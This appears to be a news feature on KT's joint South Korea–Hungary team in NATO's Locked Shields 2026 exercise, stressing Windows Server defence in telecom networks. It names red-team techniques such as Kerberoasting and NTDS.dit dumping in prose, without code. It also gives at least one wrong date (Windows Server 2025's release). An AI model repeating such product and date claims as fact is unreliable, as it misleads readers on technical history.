KT, one of South Korea’s premier telecommunications operators, revealed on May 10, 2026, that it had joined forces with Hungarian experts in NATO’s Locked Shields 2026 cyber defence exercise. The annual event, orchestrated by the NATO Cooperative Cyber Defence Centre of Excellence (CCDCOE), ran from April 20 to 24 and thrust participants into a blistering simulation of a nation-state assault on critical infrastructure. For KT, this marked a pivotal moment—not just as a telecommunications provider, but as a defender of the Windows Server–powered systems that underpin modern networks.

The exercise, often dubbed the world’s largest and most complex live-fire cyber defence drill, this year placed a harsh spotlight on telecom resilience. With attacks targeting everything from 5G core networks to billing systems, the blue teams—including KT’s joint South Korea–Hungary squad—grappled with adversaries who exploited Windows Server vulnerabilities with unnerving precision. The outcome: a sobering reminder that the server room is now the front line.

What Is Locked Shields?

Locked Shields began in 2010 as a modest tabletop exercise and has since ballooned into a multinational cyber war game involving over 2,000 participants from more than 30 nations. Organized by the NATO CCDCOE in Tallinn, Estonia, it pits “blue teams” of defenders against expert “red teams” playing the role of hostile state actors. The scenario is built on a fictional but plausible crisis, often involving a regional power struggle that spills into cyberspace.

Unlike capture-the-flag contests, Locked Shields demands full-spectrum defence. Teams must protect a simulated national infrastructure—power grids, financial systems, water treatment plants, and, increasingly, telecommunications networks. A key twist: the exercise incorporates legal, strategic, and media challenges, forcing participants to navigate the fog of war while briefing fictional government officials and managing public panic. In 2026, the scenario centred on “Berylia,” a small nation whose telecom backbone came under sustained attack from a hostile neighbour. Every blue team inherited an identical IT environment, provisioning identical Windows Server 2025 domain controllers, SQL Server clusters, and Azure Stack HCI deployments—a deliberate choice to mirror real-world telco architectures.

Windows Server at the Heart of the Battle

Why Windows Server? The answer is simple: it dominates the server landscape in telecommunications. From Active Directory (AD) forests managing millions of user identities to DNS services routing call flows, Microsoft’s server OS is the invisible scaffold of every major carrier. In Locked Shields 2026, organizers doubled down on this reality. The simulated environment included:

  • Windows Server 2025 Domain Controllers with multi-forest trusts replicating the complex identity topologies of a real telecom.
  • Exchange Server 2025 for internal communications, a frequent target for credential theft.
  • SQL Server 2025 back-end databases holding subscriber data, call detail records, and network configurations.
  • Hyper-V and Azure Arc–enabled hybrid infrastructure for network function virtualization (NFV), a growing trend as operators shift from proprietary hardware to software-defined networks running on commodity x86 servers.

Red team operators wasted no time exploiting common Windows Server misconfigurations. Throughout the five-day exercise, after-action reports would later reveal, attackers gained initial access through unpatched zero-day vulnerabilities in the Server Message Block (SMB) protocol—a flaw eerily reminiscent of EternalBlue, yet tailored to the 2025 kernel. Once inside, they weaponized Kerberoasting to crack service accounts, dumped NTDS.dit for offline password cracking, and deployed ransomware against domain controllers after disabling Windows Defender Application Control.

KT’s Joint Team: A Telecom Perspective on Defence

KT’s inclusion in a joint team with Hungary is no accident. South Korea has invested heavily in cyber defence following a series of high-profile outages attributed to North Korean advanced persistent threat (APT) groups, while Hungary has become a CCDCOE hub. The blended team brought together KT’s operational experience managing one of the world’s most advanced 5G networks and Hungarian specialists skilled in national-level incident response and forensics.

“Telecom operators are unlike any other enterprise,” noted a KT security architect in a post-exercise interview. “We don’t just run IT; we run the critical communications fabric for millions of people. When a domain controller goes down, it’s not just email that stops—it’s emergency calls, financial transactions, and industrial control.” That perspective shaped the team’s defence strategy. Instead of merely hardening servers, they prioritized segmentation, real-time log correlation, and rapid recovery of Active Directory services—often under direct attack from the red team’s wiper malware.

Windows Server–specific tactics employed by the joint team included:

  • Just-in-Time (JIT) privileged access: Using Microsoft Identity Manager to enforce time-bound, approval-gated administrator rights, drastically reducing the attack surface for credential theft.
  • Centralized Event Log Forwarding: All Windows Event Logs were streamed to a SIEM running on Azure Sentinel, enabling cross-forest correlation that spotted lateral movement within minutes.
  • Virtual Secure Mode and Credential Guard: Enforced on all domain controllers and Hyper-V hosts via Group Policy, preventing the red team from extracting plaintext credentials even after compromising the LSASS process.
  • Regular AD forest recovery drills: The team automated the restoration of domain controller snapshots to Azure Backup, ensuring that even if ransomware encrypted the primary DC, operations could resume within two hours—a crucial metric for telecom availability.

The Telecom-Specific Threats Uncovered

Locked Shields 2026 did more than test generic Windows Server security. It forced teams to confront telecommunication-specific attack vectors that are poorly understood outside the industry. Among the most devastating:

SS7 and Diameter Protocol Exploitation over IP

While the exercise focused on IP networks, the red team simulated attacks against the signalling backbone by corrupting the Windows-based signalling gateways. By compromising a poorly secured Windows Server acting as a Diameter Edge Agent, attackers injected fraudulent signalling messages that allowed call interception and location tracking of simulated subscribers. Defenders had to not only patch the server but also implement IPsec tunnels with certificate-based authentication and monitor unusual diameter traffic spikes via custom Windows performance counters.

5G Network Function Tampering

The virtualized 5G core—deployed on a Windows Server 2025 Hyper-V cluster—included microservices for the Authentication Server Function (AUSF) and Network Repository Function (NRF). Attackers exploited a vulnerability in the .NET runtime hosting these microservices to manipulate subscriber profiles, authorizing rogue devices onto the network. The fix? An emergency deployment of Windows Defender Application Control policies whitelisting only signed .NET binaries, coupled with runtime attestation via TPM 2.0.

Ransomware Targeting OSS/BSS Systems

Operational Support Systems (OSS) and Business Support Systems (BSS) are the lifeblood of any telco. In the simulation, these ran on a mix of Windows Server 2025 and legacy Windows Server 2019 boxes that many real-world carriers still use. The red team launched a targeted ransomware campaign that encrypted billing databases stored on SQL Server, demanding a cryptocurrency ransom to release decryption keys. KT’s team mitigated this by pre-staging rotated offline backups and employing the “Microsoft Azure SQL Managed Instance link feature” to maintain a near-synchronous replica in a separate Azure region, allowing them to failover within minutes.

Windows Server 2025: Built for the Fight?

Locked Shields 2026 offered a field test for the security enhancements baked into Windows Server 2025. Released in October 2025, the operating system introduced several feleatures directly relevant to the exercise:

  • Advanced Multilayer Security (AMS): A combination of Secured-core server hardware requirements, virtualization-based security (VBS), and hypervisor-protected code integrity (HVCI) that makes it exponentially harder for attackers to execute unsigned kernel-mode code.
  • SMB over QUIC: Allowed teams to encrypt server-to-server traffic even across untrusted networks, thwarting man-in-the-middle attacks against inter-DC replication.
  • Windows LAPS v2: Automatic local administrator password management finally built into Active Directory, removing the long-standing risk of identical local admin passwords across server farms.

Teams that fully embraced these features—including KT’s—fared noticeably better. In post-exercise scoring, the joint team ranked in the top quartile for technical defence, with evaluators specifically praising their “baked-in” reliance on Windows Server 2025 native controls rather than bolt-on third-party tools.

Yet the exercise also exposed gaps. Many participants struggled with the complexity of correctly configuring HVCI and Credential Guard on older hardware—a reminder that even the most secure OS requires organizational discipline. Additionally, the sheer volume of telemetry from Windows Event Logging threatened to overwhelm SIEM systems, underscoring the need for intelligent filtering and correlation, such as Microsoft’s own “High Value Events” curated list introduced in early 2026.

The Human Factor: Training for the Next Crisis

No amount of server hardening replaces human judgment. Locked Shields deliberately injects chaos: mid-exercise, the blue team might face a mock press conference demanding answers, or a legal injection requiring a decision on whether to disconnect the compromised segment of the network—a choice that in a real telco could isolate thousands of emergency calls. KT’s team, leveraging both Korean and Hungarian experience, adopted a battle rhythm of 15-minute operational stand-ups, mirroring real telecom network operations centres (NOCs).

Crucially, they integrated “Purple Team” methodologies on the fly. When Windows Defender detected anomalous PowerShell execution, defenders didn’t just block it; they analysed the command to understand the attacker’s objective, then applied targeted controls while leaving a honeypot to study attacker behaviour. This active defence posture—sanctioned in the exercise rules—paid dividends, allowing them to trace an intrusion back to a compromised administrative workstation and sever it before lateral movement could spread.

Lessons for the Windows Server Community

The 2026 Locked Shields exercise delivers three urgent messages for Windows Server administrators, not just in telecom but across any critical sector:

  1. Segment, segment, segment: Flat networks are a death sentence. Use VLANs, network security groups, and Windows Firewall with IPsec to enforce least-privilege communication between application tiers. KT’s team created isolated management subnets for domain controllers and Hyper-V hosts, with jump servers protected by multi-factor authentication.

  2. Rehearse recovery—not just backup: Regularly test restoring a domain controller from bare metal. In the simulation, teams that merely had backups but had never practiced rebuilding Active Directory lost precious hours retrieving and re-promoting servers. Automated recovery scripts using Windows Server Backup and PowerShell Desired State Configuration (DSC) became the gold standard.

  3. Embrace native security capabilities: The gap between Windows Server 2025’s and Windows Server 2019’s security posture is vast. Organizations still dragging their feet on upgrade cycles are leaving themselves exposed to exploits that modern mitigations can blunt. The exercise proved that HVCI, Secured-core, and Credential Guard are not just marketing—they are force multipliers.

Global Implications: Telecom Cyber Resilience as a NATO Priority

KT’s participation underscores a broader shift. At the 2026 NATO Summit in Brussels, allies formally acknowledged telecommunications as a critical domain requiring collective defence. Locked Shields mirrors this by devoting its entire scenario to telecom infrastructure for the first time. For Windows Server professionals, this means the stakes have never been higher. A compromised domain controller is no longer just an IT incident; it can escalate into a national security crisis.

South Korea, a NATO partner on the front line of cyber conflict with state-backed APTs, sees exercises like Locked Shields as essential preparation. KT’s team now plans to incorporate exercise insights into its operator-wide security standards, potentially publishing best-practice guides for the Windows Server community. “We learned that the boundary between IT and network security has dissolved,” said a KT spokesperson. “You cannot secure the 5G core without locking down every Windows Server that touches it.”

Looking Ahead: Windows Server 2025 R2 and Beyond

While defenders caught their breath after Locked Shields, Microsoft’s development machine churns on. Rumours of Windows Server 2025 R2, codenamed “Copper,” suggest deeper integration of AI-driven threat detection—perhaps a built-in large language model that analyses event logs in real time and suggests remediation steps. For telecom operators, such capabilities could help manage the tsunami of data generated by thousands of servers across hundreds of cell sites.

But until then, the lessons from Estonia’s virtual battlefield will shape training syllabi worldwide. KT’s joint team proved that collaboration across borders, combined with a rigorous Windows Server defence strategy, can hold the line—even against a determined and well-funded adversary. For the rest of us, the message is clear: patch your DCs, enable Credential Guard, and start practicing your AD recovery. The next Locked Shields scenario is already being written.

Get involved: The NATO CCDCOE publishes unclassified after-action reports and guidance from each Locked Shields exercise. Windows Server administrators can also join the Microsoft Security Community to share detection analytics and response playbooks. The next exercise—Locked Shields 2027—is open for observer applications from alliance and partner nations.